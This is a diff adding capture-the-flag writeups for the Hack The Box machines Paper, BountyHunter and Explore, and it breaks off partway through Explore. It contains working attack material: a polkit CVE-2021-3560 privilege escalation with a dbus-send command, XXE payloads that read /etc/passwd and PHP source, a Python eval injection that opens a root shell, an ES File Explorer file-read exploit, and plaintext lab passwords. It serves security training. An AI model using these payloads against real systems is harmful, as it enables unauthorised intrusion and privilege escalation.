+Here we see that there should be a buffer overflow vulnerability with the sudo binary, vulnerability nicknamed "Baron Samedit". To check if it is vulnerable we need to run **sudoedit -s /** and if it returns **sudoedit /: not a regular file** then it is vulnerable:
+
+
+ [dwight@paper ~]$ sudoedit -s /
+ usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
+
+
+
+It's not, however linpeas.sh also picked up that the VM is vulnerable to CVE-2021-3560, so let's exploit it as follows:
+
+
+ [term1]
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
+ --2022-08-30 21:29:20-- https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 2803 (2.7K) [text/plain]
+ Saving to: ‘CVE-2021-3560.py’
+
+ CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0.001s
+
+ 2022-08-30 21:29:20 (4.58 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]
+
+
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 -
+
+ [term2]
+ [dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py
+ --2022-08-30 15:29:44-- http://10.10.14.13:9090/CVE-2021-3560.py
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 2803 (2.7K) [text/x-python]
+ Saving to: ‘CVE-2021-3560.py’
+
+ CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0s
+
+ 2022-08-30 15:29:44 (123 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]
+
+ [dwight@paper ~]$ which python python3
+ /usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin)
+ /usr/bin/python3
+ [dwight@paper ~]$ python3 CVE-2021-3560.py
+
+ ##############CVE-2021-3560##############
+ # __________ .__ __ .__ __ #
+ # \______ \____ | | | | _|__|/ |_ #
+ # | ___/ _ \| | | |/ / \ __\ #
+ # | | ( <****_> ) |_| | || | #
+ # |____| \____/|____/__|_ \__||__| #
+ # \/ #
+ # Local Privilege Escalation Exploit #
+ # Author: Salman Asad (@deathflash1411) #
+ #########################################
+
+ [+] User created!
+ [+] Username: flash
+ [+] User ID: 1005
+ [!] Run the below command a few times ( <****10) and login via su - flash
+
+ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $!
+ [dwight@paper ~]$
+
+
+
+So let's follow the script's instructions:
+
+
+ [dwight@paper ~]$ python3 CVE-2021-3560.py
+
+ ##############CVE-2021-3560##############
+ [+] User created!
+ [+] Username: flash
+ [+] User ID: 1005
+ [!] Run the below command a few times (<****10) and login via su - flash
+
+ [dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye
+ [dwight@paper ~]$ su - flash
+ Password:
+ [flash@paper ~]$ id
+ uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel)
+ [flash@paper ~]$ sudo su
+
+ We trust you have received the usual lecture from the local System
+ Administrator. It usually boils down to these three things:
+
+ #1) Respect the privacy of others.
+ #2) Think before you type.
+ #3) With great power comes great responsibility.
+
+ [sudo] password for flash:
+ [root@paper flash]# id
+ uid=0(root) gid=0(root) groups=0(root)
+ [root@paper flash]# cat /root/root.txt
+ 2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it! We managed to get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/66.md b/Easy/66.md
new file mode 100644
index 0000000..b0e71e6
--- /dev/null
+++ b/Easy/66.md
@@ -0,0 +1,375 @@
+# BountyHunter Writeup
+
+
+
+## Introduction :
+
+BountyHunter is an easy Linux box released back in July 2021
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → vim /etc/hosts
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cat /etc/hosts | grep bounty
+ 10.129.95.166 bountyhunter.htb
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → nmap -sCV bountyhunter.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 16:10 UTC
+ Nmap scan report for bountyhunter.htb (10.129.95.166)
+ Host is up (0.027s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
+ | 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
+ |_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-title: Bounty Hunters
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+We click "Portal" and it shows us the following:
+
+
+
+So here we see that we can input some text in the fields, so let's intercept it with burpsuite:
+
+ 
+
+So here we see that forwarding the request, once sent adds data to a DB. However let's take a closer look at the data which seems to be a base64 string once b64 decoded:
+
+
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → vim data
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cat data
+ <****?xml version="1.0" encoding="ISO-8859-1"?> <****bugreport> <****title>niihlism
+ <****cwe>cwe
+ <****cvss>10.0
+ <****reward>999999
+ <****/bugreport>
+
+So from here, we can modify the xml data with a payload to print out /etc/passwd:
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → vim data
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cat data
+ <****?xml version="1.0" encoding="ISO-8859-1"?> <****!DOCTYPE nothing [ <****!ELEMENT nothing ANY > <****!ENTITY nihilism SYSTEM "file:///etc/passwd" >]> <****bugreport> <****title> &nihilism;<****/title> <****cwe>cwe <****/cwe> <****cvss>10.0 <**/cvss>
+ <****reward>999999 <****/reward> <****/bugreport>
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → base64 -w0 data
+ PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KICA8IURPQ1RZUEUgbmloaWxpc3QgWyAgCiAgPCFFTEVNRU5UIG5paGlsaXNtIEFOWSA+CiAgPCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIiA+XT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5uaWhpbGlzbTwvdGl0bGU+CgkJPGN3ZT5jd2U8L2N3ZT4KCQk8Y3Zzcz4xMC4wPC9jdnNzPgoJCTxyZXdhcmQ+OTk5OTk5PC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+Cg==%
+
+Then use the b64 string in the burp repeater, and don't forget to URL encode it by selecting it and pressing CTRL+U, then click send:
+
+
+
+So now we know the users on the system, so let's continue by looking for other files:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://bountyhunter.htb/ -x php
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://bountyhunter.htb/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Extensions: php
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 11:10:47 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.php (Status: 403) [Size: 281]
+ /index.php (Status: 200) [Size: 25169]
+ /resources (Status: 301) [Size: 324] [--> http://bountyhunter.htb/resources/]
+ /assets (Status: 301) [Size: 321] [--> http://bountyhunter.htb/assets/]
+ /portal.php (Status: 200) [Size: 125]
+ /css (Status: 301) [Size: 318] [--> http://bountyhunter.htb/css/]
+ /db.php (Status: 200) [Size: 0]
+ /js (Status: 301) [Size: 317] [--> http://bountyhunter.htb/js/]
+
+
+
+So let's try to print out the db.php file using the php filter base64-encode method to avoid having the php code being executed when we try to read it:
+
+
+ <****?xml version="1.0" encoding="ISO-8859-1"?> <****!DOCTYPE nothing [ <****!ELEMENT nothing ANY > <****!ENTITY nihilism SYSTEM "php://filter/convert.base64-encode/resource=db.php" >]> <****bugreport> <****title> &nihilism;<****/title> <****cwe>cwe <****/cwe> <****cvss>10.0 <****/cvss> <****reward>999999 <****/reward> <****/bugreport>
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → base64 -w0 dataphp
+ PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBub3RoaW5nIFsgIAogIDwhRUxFTUVOVCBub3RoaW5nIEFOWSA+CiAgPCFFTlRJVFkgbmloaWxpc20gU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPWRiLnBocCIgPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jm5paGlsaXNtOzwvdGl0bGU+CgkJPGN3ZT5jd2U8L2N3ZT4KCQk8Y3Zzcz4xMC4wPC9jdnNzPgoJCTxyZXdhcmQ+OTk5OTk5PC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+Cg==%
+
+` 
+
+So it managed to read the db.php file and gave out it's contents in b64 format, so let's decode it:
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → echo 'PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo='
+ | base64 -d
+ <****?php
+ // TODO -> Implement login system with the database.
+ $dbserver = "localhost";
+ $dbname = "bounty";
+ $dbusername = "admin";
+ $dbpassword = "**m19RoAU0hP41A1sTsq6K** ";
+ $testuser = "test";
+ ?>
+
+
+
+And now we have credentials ! Coupled with the development username we found earlier, we login:
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → sshpub development@bountyhunter.htb
+ The authenticity of host 'bountyhunter.htb (10.129.95.166)' can't be established.
+ ED25519 key fingerprint is SHA256:p7RCN4B2AtB69d0vE1LTmg0lRRlnsR1fxArJ+KNoNFQ.
+ This key is not known by any other names.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'bountyhunter.htb' (ED25519) to the list of known hosts.
+ development@bountyhunter.htb's password:
+ Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Sun 20 Nov 2022 11:16:54 AM UTC
+
+ System load: 0.01
+ Usage of /: 23.7% of 6.83GB
+ Memory usage: 13%
+ Swap usage: 0%
+ Processes: 217
+ Users logged in: 0
+ IPv4 address for eth0: 10.129.95.166
+ IPv6 address for eth0: dead:beef::250:56ff:fe96:475
+
+
+ 0 updates can be applied immediately.
+
+
+ The list of available updates is more than a week old.
+ To check for new updates run: sudo apt update
+
+ Last login: Wed Jul 21 12:04:13 2021 from 10.10.14.8
+ development@bountyhunter:~$ id
+ uid=1000(development) gid=1000(development) groups=1000(development)
+ development@bountyhunter:~$ cat user.txt
+ 62XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We managed to login as the development user.
+
+## **Part 3 : Getting Root Access**
+
+Then, in order to privesc, we use linpeas.sh as we did on the Previse box:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/BountyHunter]
+ → locate linpeas.sh
+ /home/nothing/HTB/Cap/linpeas.sh
+ /home/nothing/HTB/Knife/linpeas.sh
+ /home/nothing/HTB/Paper/linpeas.sh
+ /home/nothing/HTB/Previse/linpeas.sh
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cp /home/nothing/HTB/Previse/linpeas.sh .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/BountyHunter]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ development@bountyhunter:~$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ development@bountyhunter:~$ wget http://10.10.16.14:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-11-20 11:19:30-- http://10.10.16.14:9090/linpeas.sh
+ Connecting to 10.10.16.14:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[==========================================================================================================================================================>] 757.98K 123KB/s in 9.3s
+
+ 2022-11-20 11:19:41 (81.1 KB/s) - ‘/tmp/peas.sh’ saved [776167/776167]
+
+
+ development@bountyhunter:~$ chmod +x /tmp/peas.sh
+ development@bountyhunter:~$ /tmp/peas.sh
+
+
+` 
+
+Let it run, then scrolling through the output we see the following:
+
+
+
+So apparently the user development can run a python script as the root user, so let's take a look at it:
+
+
+ development@bountyhunter:~$ cat /opt/skytrain_inc/ticketValidator.py
+ #Skytrain Inc Ticket Validation System 0.1
+ #Do not distribute this file.
+
+ def load_file(loc):
+ if loc.endswith(".md"):
+ return open(loc, 'r')
+ else:
+ print("Wrong file type.")
+ exit()
+
+ def evaluate(ticketFile):
+ #Evaluates a ticket to check for ireggularities.
+ code_line = None
+ for i,x in enumerate(ticketFile.readlines()):
+ if i == 0:
+ if not x.startswith("# Skytrain Inc"):
+ return False
+ continue
+ if i == 1:
+ if not x.startswith("## Ticket to "):
+ return False
+ print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
+ continue
+
+ if x.startswith("__Ticket Code:__"):
+ code_line = i+1
+ continue
+
+ if code_line and i == code_line:
+ if not x.startswith("**"):
+ return False
+ ticketCode = x.replace("**", "").split("+")[0]
+ if int(ticketCode) % 7 == 4:
+ validationNumber = eval(x.replace("**", ""))
+ if validationNumber > 100:
+ return True
+ else:
+ return False
+ return False
+
+ def main():
+ fileName = input("Please enter the path to the ticket file.\n")
+ ticket = load_file(fileName)
+ #DEBUG print(ticket)
+ result = evaluate(ticket)
+ if (result):
+ print("Valid ticket.")
+ else:
+ print("Invalid ticket.")
+ ticket.close
+
+ main()
+
+
+This python script validates tickets with the following format:
+
+
+ development@bountyhunter:/opt/skytrain_inc$ ls -lash invalid_tickets/
+ total 24K
+ 4.0K drwxr-xr-x 2 root root 4.0K Jul 22 2021 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 22 2021 ..
+ 4.0K -r--r--r-- 1 root root 102 Jul 22 2021 390681613.md
+ 4.0K -r--r--r-- 1 root root 86 Jul 22 2021 529582686.md
+ 4.0K -r--r--r-- 1 root root 97 Jul 22 2021 600939065.md
+ 4.0K -r--r--r-- 1 root root 101 Jul 22 2021 734485704.md
+ development@bountyhunter:/opt/skytrain_inc$ cat invalid_tickets/734485704.md
+ # Skytrain Inc
+ ## Ticket to Bridgeport
+ __ticket code:__
+ **18+71+8**
+ ##Issued: 2021/06/21
+ #End Ticket
+
+
+
+So the idea is to create a poisoned ticket like so:
+
+
+ development@bountyhunter:~$ cat /tmp/nihi.md
+ # Skytrain Inc
+ ## Ticket to Bridgeport
+ __Ticket Code:__
+ ****32+110+43+ __import__('os').system('id')****
+ ##Issued: 2022/11/22
+ #End Ticket
+
+ development@bountyhunter:~$ sudo python3.8 /opt/skytrain_inc/ticketValidator.py
+ Please enter the path to the ticket file.
+ /tmp/nihi.md
+ Destination: Bridgeport
+ **uid=0(root) gid=0(root) groups=0(root)**
+ Valid ticket.
+
+
+
+And as you can see we managed to get code execution as the root user, so let's use it to spawn a root shell:
+
+
+ development@bountyhunter:~$ vim /tmp/nihi.md
+ development@bountyhunter:~$ cat /tmp/nihi.md
+ # Skytrain Inc
+ ## Ticket to Bridgeport
+ __Ticket Code:__
+ **32+110+43+ __import__('os').system('bash')**
+ ##Issued: 2022/11/22
+ #End Ticket
+ development@bountyhunter:~$ sudo python3.8 /opt/skytrain_inc/ticketValidator.py
+ Please enter the path to the ticket file.
+ /tmp/nihi.md
+ Destination: Bridgeport
+ root@bountyhunter:/home/development# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@bountyhunter:/home/development# cd
+ root@bountyhunter:~# cat root.txt
+ af1770ee0049711f6b5450004f011db0
+ afXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/67.md b/Easy/67.md
new file mode 100644
index 0000000..11846d2
--- /dev/null
+++ b/Easy/67.md
@@ -0,0 +1,337 @@
+# Explore Writeup
+
+
+
+## Introduction :
+
+Explore is an easy Android box released back in June 2021
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → nmap -sCV -p- explore.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 12:49 UTC
+ Nmap scan report for explore.htb (10.129.17.72)
+ Host is up (0.71s latency).
+
+ PORT STATE SERVICE VERSION
+ 2222/tcp open ssh (protocol 2.0)
+ | fingerprint-strings:
+ | NULL:
+ |_ SSH-2.0-SSH Server - Banana Studio
+ | ssh-hostkey:
+ |_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
+ 42135/tcp open http ES File Explorer Name Response httpd
+ |_http-title: Site doesn't have a title (text/html).
+ |_http-server-header: ES Name Response Server
+ 45141/tcp closed unknown
+ 59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
+ |_http-title: Site doesn't have a title (text/plain).
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port2222-TCP:V=7.92%I=7%D=11/20%Time=637A2270%P=x86_64-pc-linux-gnu%r(N
+ SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
+ Service Info: Device: phone
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up a http service on port 59777 so let's investigate it using gobuster:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → gobuster dir -u http://explore.htb:59777 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://explore.htb:59777
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 12:42:26 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /product (Status: 301) [Size: 71] [--> /product/]
+ /data (Status: 301) [Size: 65] [--> /data/]
+ /d (Status: 301) [Size: 59] [--> /d/]
+ /bin (Status: 301) [Size: 63] [--> /bin/]
+ /storage (Status: 301) [Size: 71] [--> /storage/]
+ /system (Status: 301) [Size: 69] [--> /system/]
+ /lib (Status: 301) [Size: 63] [--> /lib/]
+ /dev (Status: 301) [Size: 63] [--> /dev/]
+ /cache (Status: 301) [Size: 67] [--> /cache/]
+ /etc (Status: 301) [Size: 63] [--> /etc/]
+ /vendor (Status: 301) [Size: 69] [--> /vendor/]
+ /config (Status: 301) [Size: 69] [--> /config/]
+ /oem (Status: 301) [Size: 63] [--> /oem/]
+ /%20 (Status: 403) [Size: 32]
+ /sys (Status: 301) [Size: 63] [--> /sys/]
+ /init (Status: 403) [Size: 31]
+
+
+
+Trying to browse to it doesnt show much either:
+
+
+
+However when we look back at our nmap scan, it also picked up port 42135 "ES File Explorer", so we look at the available exploits for it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → findsploit es file explorer
+ ___ _ _ _ _ _
+ / __(_)_ __ __| |___ _ __ | | ___ (_) |_
+ / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
+ / / | | | | | (_| \__ \ |_) | | (_) | | |_
+ \/ |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
+ |_|
+
+ + -- --=[ findsploit v2.0 by @xer0dayz
+ + -- --=[ https://sn1persecurity.com
+
+ + -- --=[ SEARCHING: es file explorer
+
+ + -- --=[ NMAP SCRIPTS
+
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+
+ + -- --=[ METASPLOIT EXPLOIT S
+
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+ 378 gather/ie_sandbox_findfiles 2016-08-09 normal No Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
+ 550 scanner/http/es_file_explorer_open_port 2019-01-16 normal No ES File Explorer Open Port
+
+ + -- --=[ EXPLOITDB EXPLOITS
+
+ ------------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------------------------------------------- ---------------------------------
+ **ES File Explorer 4.1.9.7.4 - Arbitrary File Read | android/remote/50070.py**
+ iOS iFileExplorer Free - Directory Traversal | ios/remote/16278.py
+ MetaProducts Offline Explorer 1.x - FileSystem Disclosure | windows/remote/20488.txt
+ Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2) | windows/remote/3808.html
+ Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1) | windows/remote/24495.rb
+ Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2) | windows/remote/24538.rb
+ Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit) | windows/remote/25999.rb
+ Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC) | windows/dos/1110.txt
+ Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File | windows/remote/19603.txt
+ Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame A | windows/remote/19094.txt
+ Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptl | windows/remote/19468.txt
+ Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary | windows/remote/24116.txt
+ Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass | windows/remote/22575.txt
+ Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution | windows/remote/22734.html
+ Microsoft Internet Explorer 6 - Local File Access | windows/remote/29619.html
+ Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027) | windows/remote/3892.html
+ My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities | ios/webapps/28975.txt
+ WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection | php/webapps/35851.txt
+ ------------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+ https://www.exploit-db.com/search?q=es+file+explorer
+ https://www.google.ca/search?q=es%20file%20explorer+exploit
+ https://www.google.ca/search?q=es%20file%20explorer+exploit+site:www.securityfocus.com
+ https://www.google.ca/search?q=es%20file%20explorer+site:0day.today
+ https://www.google.ca/search?q=es%20file%20explorer+site:www.security-database.com
+ https://www.google.ca/search?q=es%20file%20explorer+site:packetstormsecurity.com
+ https://exploits.shodan.io/?q=es+file+explorer
+ https://vulners.com/search?query=es+file+explorer
+
+ + -- --=[ Press any key to search online or Ctrl+C to exit...
+
+
+
+
+In here we find a CVE to read arbitrary files on ES File Explorer, so let's try it out:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → cp $(locate 50070.py) .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → vim 50070.py
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → python 50070.py help explore.htb
+ [-] WRONG COMMAND!
+ Available commands :
+ listFiles : List all Files.
+ listPics : List all Pictures.
+ listVideos : List all videos.
+ listAudios : List all audios.
+ listApps : List Applications installed.
+ listAppsSystem : List System apps.
+ listAppsPhone : List Communication related apps.
+ listAppsSdcard : List apps on the SDCard.
+ listAppsAll : List all Application.
+ getFile : Download a file.
+ getDeviceInfo : Get device info.
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → python 50070.py listPics explore.htb
+
+ ==================================================================
+ | ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
+ | Coded By : Nehal a.k.a PwnerSec |
+ ==================================================================
+
+ name : concept.jpg
+ time : 4/21/21 02:38:08 AM
+ location : /storage/emulated/0/DCIM/concept.jpg
+ size : 135.33 KB (138,573 Bytes)
+
+ name : anc.png
+ time : 4/21/21 02:37:50 AM
+ location : /storage/emulated/0/DCIM/anc.png
+ size : 6.24 KB (6,392 Bytes)
+
+ name : creds.jpg
+ time : 4/21/21 02:38:18 AM
+ location : /storage/emulated/0/DCIM/creds.jpg
+ size : 1.14 MB (1,200,401 Bytes)
+
+ name : 224_anc.png
+ time : 4/21/21 02:37:21 AM
+ location : /storage/emulated/0/DCIM/224_anc.png
+ size : 124.88 KB (127,876 Bytes)
+
+
+
+Here the creds.jpg file looks interesting so let's download it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → wget http://explore.htb:59777/storage/emulated/0/DCIM/creds.jpg
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → file creds.jpg
+ creds.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [\012- TIFF image data, big-endian, direntries=12, manufacturer=Apple, model=iPhone XR, orientation=upper-right, xresolution=174, yresolution=182, resolutionunit=2, software=14.4, datetime=2021:03:06 02:13:37, hostcomputer=iPhone XR, GPS-Data], comment: "Optimized by JPEGmini 3.18.2.210033067-TBTBLN 0x905c306b", baseline, precision 8, 4032x3024, components 3
+
+
+
+On it we find credentials:
+
+
+
+So from here we can login as the kristi user with her password "Kr1sT!5h@Rp3xPl0r3!":
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@explore.htb
+ Unable to negotiate with 10.129.17.72 port 2222: no matching host key type found. Their offer: ssh-rsa
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → vim ~/.ssh/config
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → cat ~/.ssh/config| head -n6
+ Host explore
+ HostName explore.htb
+ User kristi
